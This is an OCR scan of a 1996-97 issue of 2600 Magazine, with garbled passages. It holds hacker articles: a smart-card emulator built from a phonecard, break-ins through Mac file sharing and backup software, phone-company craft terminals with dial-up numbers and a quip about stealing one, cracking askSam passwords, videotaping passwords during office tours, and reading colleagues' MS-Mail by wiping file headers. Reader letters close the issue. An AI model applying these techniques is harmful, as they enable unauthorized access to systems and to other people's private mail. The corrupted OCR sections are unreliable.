+5V or small current applied to the Zener diode 
at the “ext power” input) will allow for cards 
that draw extreme amounts of current or added 
convenience in programming and/or reduction 
of jumper pins. 

To be able to read out and write to memory 
cards, the 3.58 MHz will not be used and shut 
off (jump JP1), disconnected (open JP2), and 
DTR will provide for CLK pulses (jump JP3). 
RTS will be used to reset the card. If it is in the 
interest to power from the serial port, the posi- 
tion of JP5 should be that RST is inactive when 
RTS is providing power. During this reset time, 
the clever programmer will set TxD to provide 
continued power. In the French type phonecards, 
TxD will provide the actual reset and JP4 will be 
jumped as TxD will be providing power and pre- 
venting an RxD signal otherwise. (A quick note 
to someone programming: a “0” sent to the ser- 
ial port produces a positive voltage or “mark” 


Vcc 
pin 1 RS232 on DY 
RST al Q2 Q3 
pin 2 33k BC557B BC557B 
RxD 
pin 2 
I/O R2 
pin 33k CTS 
pin 8 
R4 R5 
GND 10k 10k 
pin 5 Q1 T v 
BC547B R3 TxD 
6k8 pin 3 
D1 ‘INVERSE READER’ 
IN4148 one 
CARD 7 7 pin 5 
Page 18 2600 Magazine Winter 1996-97 


pindia iE 


Kietas 


e E 


condition. So when a line is said to be “provid- 
ing power”, a “0” is being put to that line. Con- 
versely, what comes from the card I/O is 
inverted before going to the serial port. To power 
a card at least one and preferably two lines 
should be “providing power”. If this is not possi- 
ble for a certain card, or if the card draws heavy 
current, additional power must be supplied.) 

JP5 is to be set so RTS is active for “most of 
the time”. This will be fully dependent on the 
type of card used. For “active low” resets, as in 
most processor cards, RST (pin 2) will be con- 
nected to U1 pin 8, allowing RTS to be active 
while the card is active. For active high resets, a 
further inversion available at U1 pin 10 will 
provide a “0” when RTS is active. 

To be able to write software, the program- 
mer should have some knowledge of electron- 
ics or be within reach of someone who does. 
Except for writing French cards, simple code 
has been written to prove the concept. For 
French cards making RTS inactive will place 
+21V on Vpp (pin6) and +5V on the nR/W pin 
(pin 2), burning the tic and making the I/O go 
to a “0”. In no case is the I/O port used to input 
data on a French card. Areas in the dashed lines 
apply only to French type memory cards and 
may be omitted if these are not of interest. 

This circuit is but one example that will 
cover all aspects of ISO/IEC 7816. Emphasis 
was given to a solution requiring no special 
components or programming fixtures. Low cost 
was also a major consideration. The card socket 
may be regarded by some as a “special compo- 
nent”. They are made by ITT Cannon, Omron, 
and Alcatel among others. This is a new area of 
hobby so therefore your favorite over-the- 
counter parts house will almost certainly not 
carry them. The better distributors like Rodelco 
carry a full range of them. Cheaper ones (from 
consumer products) will ruin cards in no time 
and the features of the expensive types are 
probably not warranted for this application. 


Inverse Reader Notes 
The supplied schematic is for the emulation 
of processor type cards or to program devices 


that take processor cards. A special PCB could 
be made to bring out the four needed lines. 
Note the CLK is ignored and it is assumed the 
bit rate of the system is known. Use of a spent 
phonecard is a quick and cheap alternative to 
using a print. If using a print (PCB), it is well 
advised that the contacts are gold plated. In 
“consumer” cases, such as satellite decoders, it 
will be 9600 bps. The circuitry is capable of op- 
erating at any speed provided by a PC. 

No schematic will be provided for synchro- 
nous card inverse readers. The clock must be 
brought out and all other details are supplied in 
the text. It is not the intent of this article to be 
about “free” calls. 


How to Use a Spent Phonecard 

The chip is a very small, approximately 1 
mm square piece of silicon located directly in 
the center of the module. To remove this, turn 
the card over and locate this point. Usually 
there will be an indication visible as an 8 mm 
circle on the back. The chip is in the exact cen- 
ter of this epoxy which is below the plastic. 
Carefully cut the bottom plastic of the card to 
reveal the black epoxy. The epoxy is rather soft 
so it can be cut down to the chip which is very 
hard. Break out the chip in pieces until you 
reach the metal of the ground contact. At this 
point you could carefully solder to the top of 
the card and place the wires in cut grooves so 
they are flush to the surface. Using low heat of 
about 175 degrees Celsius, you can fix the 
wires in the grooves or simply glue them down 
with epoxy. The card must maintain its constant 
thickness of about 0.85 mm. If you are more 
ambitious, continue to carefully remove the 
epoxy to reveal eight contact points where the 
chip’s bonding wires went and carefully solder 
from the bottom. As before, run the wires in 
grooves cut to the middle, bottom, or the far 
end of the card depending on the application. 
You may waste a card or two while you develop 
the technique, so have a few extra! 


(continued on page 46) 
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BIGGEST MAC MISTAKES 


by The Guy Who Was In 
Craig Neidorf’s Spanish Class 
And Had No Idea 


As an IS/IT contractor, I know that folks 
take the simplicity of the Macintosh inter- 
face for granted and underestimate the cu- 
riosity of the Mac users. A nosey user can 
come along and mess things up nicely. 

This article discusses basic ways a Mac- 
intosh network can be attacked or compro- 
mised. The three open doors that I see on 
networks are File Sharing, Retrospect Re- 
mote, and Appletalk Remote Access. 


File Sharing 

To access a shared device, Mac users on 
a network access an AppleShare Server or a 
desktop computer with File Sharing acti- 
vated by selecting the Chooser under the 
Apple Menu, then selecting the AppleShare 
icon, then choosing a zone, and then dou- 
ble-clicking on a shared device. 

A screen with fields requiring a user 
name and password for registered users 
comes up. If the user enters a valid name 
and password, then access is gained to 
whatever directories or drives are available 
to that registered user. If guest access is en- 
abled, then users can select the radio button 
next to “Guest” without entering a user 
name and password, and click OK, giving 
them access to whatever has been assigned 
to Guest users. 

To share a computer (not using the Ap- 
pleShare Server, but the AppleShare that 
comes with every Macintosh system), the 
following is done. On the computer to be 
shared, users go to Sharing Setup in the 
Control Panels folder and enter Owner 
Name, Macintosh Name, and Password in 
appropriate fields. Next they click the Start 
button next to the words File Sharing. If 


there is no password or user name, the com- 
puter will notify the user that this is a bad 
idea. Users then select the drive icon or fold- 
ers to be shared with the mouse, then choose 
Sharing from the File menu and click on the 
check box with Share This Item And Its 
Contents. The entire hard drive or folder can 
be made available to users in varying de- 
grees by using check boxes for See Folders, 
See Files, and Make Changes next to the 
words Owner, User/Group, and Everyone. 

If a user wants to set up access to a com- 
puter for multiple users, then the user goes 
to the Users & Groups control panel. There 
will be a blockhead icon there for the 
Owner and one for Guest. By going to New 
User under the File menu, other blockheads 
can be created for different users with dif- 
ferent passwords. 


Where The Mistakes are Made 
with File Sharing 

I work at an advertising agency with 
thirty zones that connect offices in more 
than a dozen cities across the country. 
There are nearly 100 Macintosh computers 
wide open on the WAN because of one rea- 
son: filesharing is poorly configured. I have 
worked at companies with world-wide 
WANs (more than 30 offices and 4,000 
users - if you read the MacWeek 200, you 
might know who I’m talking about), and 
they are no better than the lone zone rinky- 
dink production shops. In fact, the larger 
the WAN, the harder it is to monitor file- 
sharing and the more likely there are gaping 
access holes. 

I. Guest access is turned on. When 
turning on filesharing, the user opens the 
Guest blockhead in the Users & Groups 
control panel and selects the check box for 
Allow Guests To Connect thinking that 
without this, no users can connect to the 
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computer. In truth, this allows anybody to 
log on as guest to any shared item where 
Everyone is assigned the privileges See 
Folders, See Files, and Make Changes. 

2. User shares the entire drive instead of 
certain folders. User selects the hard drive 
icon with the mouse, then chooses Sharing 
from the File menu and clicks on the check 
box with Share This Item And Its Contents. 
A user may compound the problem by se- 
lecting the check box for Make All Cur- 
rently Enclosed Folders Like This One 
which, after a warning, will change already 
specified privileges for folders inside the 
drive. Unless separate privileges are as- 
signed for the folders contained within the 
hard drive, all of the folders within will be 
available to users. The user needs to make 
sure they select the correct Owner or 
User/Group for each folder to allow only 
certain users to access certain folders. In 
order to share a folder within a hard drive, 
but not the hard drive itself, the hard drive 
icon need not be shared at all. Just share the 
folders within the drive. 

3. User leaves password blank and uses 
the same words for Owner Name and Mac- 
intosh Name. The Owner Name and Macin- 
tosh Name should not be the same in the 
Sharing Setup control panel. If they are, an 
unauthorized visitor can type the device 
name (which shows up in the Chooser) as 
the user name and leave the password blank 
to check each computer on the WAN one by 
one to see if the password is blank. If it 1s, 
the unauthorized visitor has complete ac- 
cess to the shared items. A variation on this 
is when the machine name is Joe Blow’s 
IIsi. The logical user name is, of course, Joe 
Blow. Even better, the password name is of- 
ten “Joe Blow”, or “joe blow” (Mac pass- 
words are case sensitive, but user names are 
not), or “joe”, or “blow”, or one of several 
other variations on the theme. 


Retrospect Remote 
Retrospect Remote is the de facto stan- 


dard in network backup software for the 
Macintosh. A control panel is installed 
(called Remote) on each machine that al- 
lows the server to access the drive. At Shut- 
down, the Retrospect control panel throws 
up another screen that says “Now waiting 
for backup...” and has Shutdown and 
Restart buttons. A screen saver will kick in 
a few seconds after this window comes up. 
The control panel allows files to be read 
from and copied to the startup drive or any 
attached readable and/or writable devices. 

The control panel is configured from the 
Retrospect backup server by selecting Con- 
figure, then Remotes, and then Network. In 
the Network window you can select differ- 
ent zones and see available Retrospect Re- 
mote indicators next to machine names. 
These indicators come in three types: Not 
Activated, Not Logged In, and Responding. 
If you double click on a Not Activated de- 
vice, the server will check with the device 
and try to allow you to configure the control 
panel, which includes entering an activator 
code, password, and selecting drives at- 
tached to the device for backup. If you dou- 
ble click on a Not Logged In device, the 
server will attempt to connect you to the 
device. It may ask for a security code. If it 
does not, you will be allowed to change 
configurations and the server from then on 
will recognize the device as responding. If 
you double click on Responding, you may 
be asked for a security code, or if none is 
required, you will be allowed to change the 
configuration. 


Where The Mistakes are Made 
with Retrospect Remote 

1. Not putting a password in the config- 
uration. In the 30 zones available here, you 
can access the entire hard drives of some 20 
computers because their Remote control 
panels have not been assigned passwords. 
That includes more than five servers. As 
long as you have a Retrospect Remote 
server you can configure the Remote con- 
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trol panel and any Remote control panel 
that allows you access means that you can 
back up any attached storage devices to 
DAT (or whatever media you use). Backups 
can be restored to any computer, not just 
the one the data was backed up from. 

2. Not activating Remote control panels. 
An unauthorized person could find unacti- 
vated control panels, enter an activator 
code, backup the hard drive to DAT, and 
then in the Network remote configuration, 
deactivate the control panel when finished. 
This would more or less restore the control 
panel to its virgin state. There is access to 
about five computers in this state. 

3. Makes owner and hard drive names 
available on network. By using the Retro- 
spect Remote server, a user can look at all 
of the owner names of any computer with 
the Remote control panel, even without 
knowing the security code. Because these 
owner names may not be the same as the 
machine names listed in the Chooser, they 
can be used to try the file sharing entrances 
explained above: owner name with blank 
password, owner name with machine name 
as password, vice versa, etc. Listings in the 
server’s Network remote configuration that 
you do have access to will also allow you 
to see the name of the startup drive and 
any other attached drives. These names are 
also fodder for user name and password 
guessing. 


Appletalk Remote Access (ARA) 

Appletalk Remote Access allows a 
Macintosh to dial into an Appletalk net- 
work. It gives the user access to servers, 
email, printers, and any other network func- 
tions the same as if the user was in the of- 
fice connected via Ethernet. 


Where The Mistake is Made with ARA 

A company has to go out of their way to 
allow ARA to access the network. At least 
one version of ARA allows users to save 
their passwords in the configuration file. 


You might be surprised at how many users 
prefer to save their password and take the 
chance rather than have to enter the pass- 
word every time they log onto the network. 
That means that if you can get an ARA con- 
figuration document with the saved pass- 
word, then you can access the network at 
will; the document already contains the 
user name and phone number, so all the se- 
crets are out and nothing more is required. 
PowerBooks, as an example, are especially 
susceptible to the saved config file and the 
other methods described in this article for 
the simple reason that they are probably the 
most stolen computer in America by per- 
centage. 


Programs That Give You An Edge 
Over Nosey Parkers 

I have found these two programs to be 
useful in monitoring security on my network. 

Network Security Guard 3.1, http:// 
www.mrmac.com/ for demo version. Lacks 
elegance and looks, but is effective. Does 
bulk password throwing at any shared drive 
on the network. Checks for the file sharing 
weaknesses mentioned above, uses dictio- 
naries, lists files available, lists suspicious 
configurations available on a network. 
Saves everything in reports. Serious pro- 
gram for protecting yourself from attacks, 
but can also be used against you. When used 
it hogs all available processing power, so a 
dedicated Mac is good. You will want to run 
it during the day when computers are turned 
on and the network is at its most active. 

Lookout! by Pace Bonner & Jeff Amfahr, 
PB Computing, distributed by Trik, Inc. at 
800-466-TRIK, _http://www.pbcomputing. 
com/. Part of the Nok Nok Package of Ap- 
pleShare monitoring and control software. 
This control panel indicates in the Chooser 
next to the machine names whether guest 
access is enabled and what kind of fileshar- 
ing is enabled. Makes checking each listing 
for guest access much faster, particularly on 
a large network. 
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CRAFT ACCESS TERMINAL 


by Local Loop 

Aside from the butt sets, phone techs 
(linemen, splicers, etc.) also carry some- 
thing known as CATs. Yellow handset 
lookalikes. They have been out for a while 
now and almost all of you have probably 
seen them. The regular TS-21 type handsets 
have almost faded as the CATs can do 
everything a TS type handset does and 
more! In this article I will briefly introduce 
the System, List the menus attained, and 
describe the sequence of events occurring 
when testing, etc. Here it goes. 


CAS Test Site 

Let’s start with CAS (Craft Access Sys- 
tem). CAS is a network of computers that 
provides the technician in the field direct 
access to the operating systems through 


hand-held computer terminals known as 
CATs. A tech can use CAT to perform vari- 
ous functions like dispatch, closeout, and 
testing, etc. Before CATs were introduced, 
dispatches and testing were done by calling 
into the dispatch office or the CO for vari- 
ous testing. This network of computers in- 
cludes computer systems like LMOS 
HCFE (High Capacity Front End) and 
SARTS (lovingly called FARTS). 

The CAS includes the AC (Administra- 
tive Computers) and the APs (Application 
Processors) which are directly linked by 
phone to CATs. Refer to the diagram below 
for the total picture: 

The AC provides security, keeps a his- 
tory of current jobs, handles disk storage 
functions and downloads information to the 
APs. The APs are usually located in the 
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COs, manage craft access dial-in lines (in 
other words, this is where the tech dials in 
using his CAT), software etc. Each AP can 
hold about 15 APM (Modules) and each of 
these APMs can have five dial-in lines ac- 
cessed by a hunt group number sequence. 

The connections between DATAKIT 
and the other host machines like APs and 
AC are synchronous. This network also 
supports LMOS/MLT (Mechanized Loop 
Test) for testing POTS (plain old telephone 
service). 

The CAT, yellow in color, has a joystick 
below the terminal screen. See below: 


BACK 


(_) 


ur mm 
Hx aS 


REVIEW 


In the above diagram (self explanatory), 
move as you wish. 


Menus on the CAT 

There are 14 main job screens or menus 
that can be accessed on the CAT. Here they 
are as follows: 

LOOK AT LINE RECORD 

From the Main Menu select: 

1. work on current job 

2. other test menu 

3. look at line record 

REARRANGE BULK LOAD 

From the Main Menu select: 

1. other 

2. reorder bulk jobs 

3. update sequence 

RETURN INCOMPLETE 

From the Main Menu select: 

1. close or return 

2. return incomplete 

3. other 

TROUBLE CLEARED IN CO 

From the Main Menu select: 

1. close or return 


TEST OK 
From the Main Menu select: 
1. close or return 
2. test ok 
(Loyal telephone customers must agree 
that service is now OK.) 
TROUBLE ISOLATED IN CO 
From the Main Menu select: 
1. close or return 
2. return menu options 
3. return to CO 
(This is when the tech says, “I am sorry 
sir, further work will be required on your 
line.” 
PAIR CHANGE 
From the Main Menu select: 
1. close or return 
2. return to menu options 
3. return incomplete 
4. pair change-CO work to be done 
This is when Cable Pair Change is nec- 
essary to rectify the problem. 
RETURN TO CABLE 
From the Main Menu select: 
1. close or return 
2. return menu options 
3. return to cable 
LOCATE TWO SIDED FAULT 
From the Main Menu select: 
1. work on the current job 
2. locate fault 
3. verify fault 
4. verify good pair 
5. locate 2 sided fault 
TONE ON LINE 
From the Main Menu select: 
1. work on current job 
2. get tone or MDF 
DROP TONE WHEN DONE 
1. work on current job 
2. other test menu 
3. drop tone, locate, coin, or MDF 
CHECK COMMITMENT DATE 
From the Main Menu select: 
1. close or return 


2. return menu options 2. no access 
3. return to CO LOCATE ONE SIDED FAULT 
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From the Main Menu select: 

1. work on current job 

2. locate fault 

3. verify fault 

4. locate one-sided test 

LINKED JOB 

Go to review mode (move down and 
press joystick down), select dispatch. Techs 
use this to link other jobs together. They 
may select it or refuse. 

USING CO SHOE TAG 

From the Main Menu select: 

1. work on current job 

2. get tone or MDF 

3. get MDF access 

4. let MLT pick shoe 


CAT - Sequence of Events when testing 

1) Techs hook up the T and Ring on any 
block and use CAT to “receive new job” 
from the dispatch office. Techs dial into the 
CAS using a 4 digit passcode. The pass- 
codes are sometimes written on the CAT 
(e.g., 4432 etc.) 

The CAT’s serial number and the 4 digit 
code are linked, so when the tech calls into 
the CAS APs, the serial number along with 
his XXXX code are matched. 

So the next time you decide to steal a 
CAT, make sure it’s on a Friday. This way, 
you can have fun with it on Saturday and 
Sunday. On Monday, when the tech informs 
the dispatch office, the passcode will die. 
However, the CAT will still keep giving you 
“bogus” menus. The CAT now is basically 
useless. The telephone company may trace 
you to the number the CAT is being used 
on. Since the CAT is officially useless, 
don’t bother using it. 

2) The circuit information for the cir- 
cuit problem will already be prepared for 
the troubled circuit. The field tech, lineman, 
or whoever will then initiate the access re- 
quest. 

3) SARTS interface relays the circuit 
access and initiates the far-end to access in 
the same way as an access coming from a 


52A TP (Test Position which is a stationary 
terminal that has access to SARTS). One 
major difference is that TSV (Test Status 
Verification) commonly known as monitor- 
ing lines, is not permitted on the CAT. 

4) Once the circuit has been accessed 
and found idle, the tech may perform vari- 
ous tests. 

5) The Far-end (like RTS - Remote 
Testing System - which is used with 
SMAS) performs the requested tests and 
sends the results back to the SARTS. 

6) The SARTS sends results to 
DATAKIT and to AP. 

7) AP sends the results to CAT display. 


Some CAS Dial-ups 
(718) 523-1177 
(718) 657-4650 
(718) 658-1666 








EA AG, Sos 


A PSS ANS 
[ PAN 


COND 


SU 
BEYC (OPE 


It’s HAPPENING THis YEAR 
New York City 
Aucust 8,9,10 

(NOTE DATE CHANGE) 
FuLL REGISTRATION INFO 
IN THE SPRING ISSUE 








Winter 1996-97 2600 Magazine Page 25 











13 


CRACKING ASkKSéA 





by Datum Fluvius 


I have used askSam since my friend lent 
me a copy several years ago, and since then I 
have come to appreciate the advantages it of- 
fers. For those out there unfamiliar with 
askSam, I will elaborate: it is a database pro- 
gram which thinks like a word processor with 
a powerful macro language. It is unique in 
my experience of databases. Unlike any other 
database I have ever used, askSam needs no 
fields or labels. It will accept them, or course, 
but it does not insist on them at all. This 
means you can import your word processing 
documents into askSam and search them in 
ways your word processor’s “find” command 
doesn’t support, like asking for each instance 
of “Dale Drew” within ten words of the term 
“snitch”, while ignoring documents which 
contain “Nancy”. In addition to its unique 
search functions, askSam also supports Hy- 
pertext links. I was introduced to this concept 
by askSam a good five years before Netscape 
made it a household word. 

Since I am poor, though, the deciding 
factor for me was that I bought my own copy 
of askSam 4.2 for DOS for under $40. 

Anyone who wishes to have the latest can 
get askSam for Windows 3.0 for just $150. If 
you have ever priced databases, you know 
that is dirt cheap! This combination of inex- 
pensive, powerful search possibilities has 
made askSam a librarian’s dream. Many li- 
braries use it, as well as genealogists and so- 
cial scientists. 

My favorite use is to import an electronic 
phone directory into it, so I can search for 
patterns in the prefix assignments for my 
city, or search for phone numbers by address 
rather than name. If I wanted to, I could pull 
the address of every woman named Martha 
on Oak Street. But that hardly ever comes in 
handy anymore since I met my wife. 
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I used askSam for so many projects over 
the years that keeping track of my passwords 
on the various files became impossible. 
Eventually I found myself locked out of 
seven or eight of my old files and had to 
crack my way back inside. Oops! 

The next time you feel secure in your se- 
curity measures, lose your password and 
crack your favorite program. You will either 
fail and feel uncertain of your own skill, or 
you will succeed and feel absolutely silly for 
extending your trust to any password. 

AskSam, to put it bluntly, is not secure. 

It uses a simple substitution cipher which 
can easily be made into a table and passed 
around, or hacked individually with an hour’s 
worth of simpleminded effort. I have found 
this to be true on both askSam for DOS 4.0 
and the askSam for Windows 3.0 demo. 


The Procedure 

First, obtain a working copy of askSam, 
of any flavor you wish. (You might want to 
download the demo copy direct from the 
company for free: http://www.asksam.com.) 
I will not guarantee that this will work on all 
versions, but the law of conservation of code 
probably holds true here, so it is worth a try. 

Next, create a series of askSam files, and 
create “update” passwords for each of them 
in the format “AAAAAAAA,” “BBBBBB 
BB,” ... “ZZZZZZZZ”. (You only need to 
crack the “update” password, since it is the 
high level access you need to change the low 
level “retrieve” password, and to access 
askSam’s encryption if that is invoked.) 
Keep plugging at this until you have ex- 
hausted the capital letters and lower case let- 
ters, and perhaps the digits and special 
characters as well. 

Next, use your favorite hex editor to peek 
at the file headers of each file, dumping the 
eight hex bytes beginning at the 30th byte 
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into any convenient location you choose, 
such as a printer. In the DOS version, these 
bytes are preceded by a 50h (“P”) and are 
easy to spot by eye. In the Windows version 
they are in exactly the same location, with- 
out any giveaway “P” Instead, it’s an AOh. 
Note the password letter of the file next to 
the string, so you know where it fits in the 
Big Picture. 

Once you have a list of what askSam 
does with each letter and number possible, 
you can set up a table to decode the pass- 
words by hand on a single spreadsheet. You 
will not be required to actually do this, since 
askSam’s programmers got lazy and left the 
same substitution table on every copy of 
askSam I’ve ever seen. Just use my handy- 
dandy password decrypting table, but re- 
member that the password is stored back- 
wards. The procedure merely gives you an 
idea of how to get around a custom substitu- 
tion cipher if one is present. Perhaps you 
could make one yourself. 

Why does this work? The reason is that 
askSam simply substitutes one hex value for 


(continued from page 48) 


another, in a one-to-one relationship. It only 
looks encrypted to a human, in part because 
the replacement alphabets are slightly 
scrambled (the substitutions don’t follow al- 
phabet order strictly) and each bit position 
uses a different setting of the “wheel”. There 
are no random offsets, RSA keys, or any- 
thing at all fancy to it. It is, in fact, a com- 
puterized version of the outdated code 
wheel, made famous in hundreds of gram- 
mar-school cipher textbooks. It is also as in- 
secure as any cipher could possibly be, since 
every copy of the program seems to use the 
same cipher wheels, set in the same way. 

These kinds of ciphers (Enigma) were 
broken by some of the earliest digital com- 
puters in the Second World War, but they at 
least depended on new code wheels every 
few days or weeks. Poor askSam need be 
broken only once, and it’s curtains for the en- 
tire lot. 

If you really like askSam, as I do, you’ll 
probably want to secure it with PGP or some 
sneaky steganographic method. At least 
those offer some defense. I think.... 





In! Post-It Note Salvation 

So they let you in for a tour. Idiots. 

First is first, aim your camera at every- 
thing. Most important is to ask about their 
“jump into the 21st century”. Companies love 
the fact that they have the money for kick-ass 
computers and have no compunctions about 
showing that to anyone who comes along. 
They’ll start blabbing about their network and 
their T1 connections and all that shit. They’ll 
log on for you. Aim the camera at the key- 
board at the best angle you can and record the 
typing. It doesn’t matter if you can see it right 
there or not. That’s the beauty of video... 
check it out in slow mo at home. 

Next, as you pass any post-it notes, check 
‘em out on video. Those little yellow bas- 
tards are like Jesus. Every office has idiots 
who write passwords on them. 
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After that, just walk around. Get anything 
on tape you can. Videotape is cheap. Don’t 
be afraid to waste it. Check out security. 
Check out their UNIX server. Check out 
everything. Use your head and just look. 
That’s all I can say. 


Clean-Up 

Throw your tape in your VCR and go 
over everything. Look for any lapses in secu- 
rity. Any passwords. Slo-mo through typing 
and post-it notes. 

The hard part is getting in. After that, it’s 
plenty easy. 


Shoutouts to The Genocide2600 and Sili- 
con Toad. Special Thanks to dumb security 
personnel in corporation buildings every- 
where. 
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by Schlork 


If your company is using MS-Mail (not 
MS-Exchange) for its email system, the 
following describes a way to snoop through 
other people’s mail. 

MS-Mail allows users to either store 
their mail and attachments on the mail 
server (the default option) or locally on the 
user’s hard drive (or another network drive). 
If mail is saved locally, it is usually stored 
in a file called MSMAIL.MMF or MAIL. 
MMF in the \WINDOWS directory. If it is 
stored on the mail server, each user will 
have a unique filename with an extension of 
MMF (example: 000003C2.MMF). These 
files are stored in a directory called \MMF\ 
which makes them easy to locate. It is not 
known at this time how to cross reference a 
filename of 000003C2.MMF back to user 
“Jane Doe”. More research will need to be 
done. 

The first 512 bytes of the MMF file is a 
header, which stores information about the 
file’s size, the number of messages and at- 
tachments, password, etc. The rest of the 
file is (presumably) the message data and 
attachments. It is compressed/encrypted to 
keep prying eyes (like ours) away. The 
method of encryption doesn’t matter; we’ll 
let MS-Mail do all the work for us. 

If the header of the file gets destroyed, 
the MMF file will need to be reconstructed. 
Luckily, MS-Mail has a fantastic MMF file 
rebuilder included! Using Mr. Norton’s 
diskedit utility, or some other hex editor, 
simply open up the .MMF file and wipe the 
first 512 bytes out with 0’s. This effectively 
removes the password from the file, and al- 
lows the messages to be viewed. 
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It is extremely important that you log 
out of your mail server!!! If you are reading 
someone else’s mail while still logged in 
under your own account, you may end up 
opening a message with a return receipt at- 
tached, which will broadcast the fact that 
you have read this piece of mail! 

Quit MS-Mail, log out of the network, 
and rename your local mail file to some- 
thing other than MSMAIL.MMEF. (This is to 
keep your personal mail file safe.) If you 
have your mail file stored on the network, 
the act of logging out of the network will 
keep your file safe. Open MS-Mail again. It 
will complain that it cannot attach to your 
mail server, but it will ask if you want to 
work offline. After selecting yes to working 
offline, MS-Mail will display the login box 
for you to enter your username and pass- 
word. Change your login name to some- 
thing other than what you login in as. You do 
not need to enter a password. (The password 
is verified against the mail server; since you 
are working offline, it can’t check it.) 

Now MS-Mail will tell you it cannot 
find your mail file (because you renamed it) 
and it will bring up an “open new file” win- 
dow. Point MS-Mail to the new .MMF file 
with the trashed header. It will come up 
with a box that says that the file has an in- 
consistency and will need to be repaired. 
Depending on the size of the file, it can take 
a long time to reconstruct it, so be prepared 
to wait. While the file is being recon- 
structed, you cannot switch to any other 
windows, so your machine is completely 
crippled during the reconstruction phase. 

Once the file has been reconstructed, 
most of the messages will appear in the 
“lost and found” mail folder. Attachments 
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will usually be lost. A portion of the mes- 
sages will also be lost. Results will vary 
with each file that you try to open. In fact, it 
may not let you into the file at all, telling 
you the username or password was invalid. 
You should, however, be able to get into 
most of the files you try, and be able to read 
a good portion of the messages inside. 

Another thing to try is to copy the 512 
byte header from your personal MMF file 
over the top of the target MMF file. You will 
need to enter your login name and password 
for this file, but after reconstruction, you 
will probably have a better chance of get- 
ting access. 

Here is some information that I have 
gathered about the headers in MMF files: 


Most of the header is zeroes. I assume 
some of the data is repeated for double re- 
dundancy. 

The fact that the file can be reconstructed 
without the password makes me think that 
the password is used only for verification of 
the user, not as a key for decrypting the file. 
This means that the password verification 
could probably be removed from the code in 
MS-Mail altogether, allowing any file to be 
opened and all the messages/attachments 
preserved! 

More research will be done on this sub- 
ject. I will also be doing work on MS- 
Exchange shortly. 


Have fun! 


WRITE FOR 2600! 


Apart from helping to get the hacker perspectwe 
out to the populace and educating your fellow hackers, 
you stand to benefit in the following ways. 


A year of 2600 for every article we print 
(this can be used toward back issues as well) 
A 2600 t-shirt for every article we print 
A voice-mail account for regular writers 
(two or more articles) 
An account on 2600.com for regular writers 


(2600.com uses encryption for both login sessions 
and files so that your privacy its greatly increased) | 


PLEASE NOTE THAT LETTERS TO THE EDITOR 
ARE NOT ARTICLES 


Send your articles to: 


2600 Editorial Dept. 
P.O. Box 99 
Middie Island, NY 11953-0099 
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YOUR LETTER CoulLD BE HERE 


The Ruling Class 


Dear 2600: 

In the second week of October, I was called into the main office of my high 
school. My mother, who happens to work there (head of nutrition, also known as the 
head cook), was also called in. When we entered the principal’s office, we were 


handed a packet of about eight to ten pages with email headers and text on the first 


four pages, and World Web: 
big trouble. Apparent! 
in the body of her email: Hs $ j 
and “bitch”. We read these ' eh x ding these’ 
did not send them, and: then directed to the last four 
pages of the packet, w! from my WWW horhe 
page. This, unfortunately, % 1 Back mo “smed a famous per- 
son, political figure, d fto flame my 
computer teacher. I sai i 
school policy” were in 4 
ing some fun with their 4# 
Another line had her e 
my UNIX shell accoun 
erslastname@schoolsd 

I was told that by p 
to privacy, and by send 
They told me that the 
friend (who has a comp 
machine that hosts my UW 
be traced to the domai 
that it couldn’t be trace 

I agreed to a three {iá 
questionable emails. I d 
mother losing her job a 
happened, and I got my: 
Unfortunately, I am stilf 


a 
ree 
Ee 


home page, but I am ree 
I wrote this becaus 
went overboard in susp 
modern day injustices 
doing something they 








# page. I had a joking j 
and the sentence had #3 


ae I came up with her E-Mail address. 
could be prosecuted for libel, slander, etc. 
ed to me, which from what I am told by 
unt) isn’t possible since email is ony: 
ät it was sent from. At the time IL dig 
ie lack of ability to prove my: 
ia, but never once did 


Anything on the net can be manipulated and email can be made to look like it 
came from someplace it didn't. If you're to be accused of sending malicious mail, 
your accusers should have their facts straight. In other words, it’ not up to the ac- 
cused to prove their innocence as much as it’s up to the accusers to prove their guilt. 
In the school environment, though, almost anything goes. Intimidation tactics and 
outright lies are frequently used to get innocent people to admit to crimes. It’s often 
advantageous to fight back rather than submit to their demands, even if they seem to 
have the upper hand. Many times, they just want the whole mess to end quickly. 


Dear 2600: 

I am currently a sophomore in high school. More and more, I can share the 
feelings that Bernie S. must have felt with the S.S. At my school, I found out their 
password which was not well chosen. I looked around the system for well over a 
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ail address, I was infringing upon her right 


month, and mastered it. Then someone saw something was up, asked around a little, 

and my name turned up. Now I am treated as if I killed someone. The punishment I 

got was equivalent to carrying a gun to school. I followed my ethics and never once 
harmed or altered anything without changing it back. 

Josh 

Abilene TX 


Dear 2600: í 


most uptight people I have ever met. 

They have given us every possible advantage such as direct ethernet connec- 
tions to the LAN and Internet from the dorms and access to SUN machines as well 
as a large lab, but when I called the help desk because my gateway on the LAN had 
been brought down, I got a rude awakening. I told them that it died while I was con- 


necting to www.2600.com, and the help desk moron went crazy. He told me I had no 


siness connecting to that site, and told me that they’d fix my gateway tomorrow, 
es 


rednecks, I guess). Can: 


G > 


more, I’m 


Its amazing how little things ë 
with petty-minded bureaucrats. And 
world, 


Folklore 


Dear 2600: 
I found from a friend a number that is supposed to detect taps. The number is 


whole lot better out here in the real 


We're not going to waste much space on this old myth except to say that its a 
slight variation on an old story - the only difference is the distinction between fed- 
eral and local taps. Cute. If we took thifseriously, every time somebody else calls 
the number we have a local tap on our lire. Add to that the fact that nearly every ex- 
change in that area has a sweep tone test on the 0003 suffix, which happens to be a 
phone company test number. J 


Finding People 


Dear 2600: 

In regards to Volume 13, Number 2, page 38, Raul in Houston was asking for a 
database to find info on people. Go to www.yahoo.com/search/people/ where you 
can enter in fields like first and last name, city, and state (or you can only enter one 
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l to college when dealing: 


field if you wish) but at any rate it will display the person’s address or phone num- 

ber. They also have one for finding email and homepages - it’s like an Internet white 
pages. 

Asmodeus 

McKinney, TX 


Info Needed 


{aps you could help me. 
interesting, but I have 


pt 


re are four carriers ac- 
make a “ping” and ac- 
othing works. I cannot 
only Brazil, England, 
USA, and Chile are accessible ee 


ee si oa 
# tones for the past 


Jorge 

Uruguay 

The best advice we can give is that ali gA& will yield to 150mS of 
+2600, 10mS silence, and 150mS of 24 imon knowledge and it is 


a Dutch telecom card. 
Geert 

Holland 

Make the check out to 


r. He mentioned that he 
t out other H/P in this 
questions to local com- 
$ ; from another H/P here. 
Couid you please send me any address info that you have on himher, either physi- 
cal or email? Social networking keeps us together. 





DoubleZeroOne 
And privacy invasion will tear us apart. We don't reveal any info about any of 
our subscribers for obvious reasons. 


Dear 2600: 

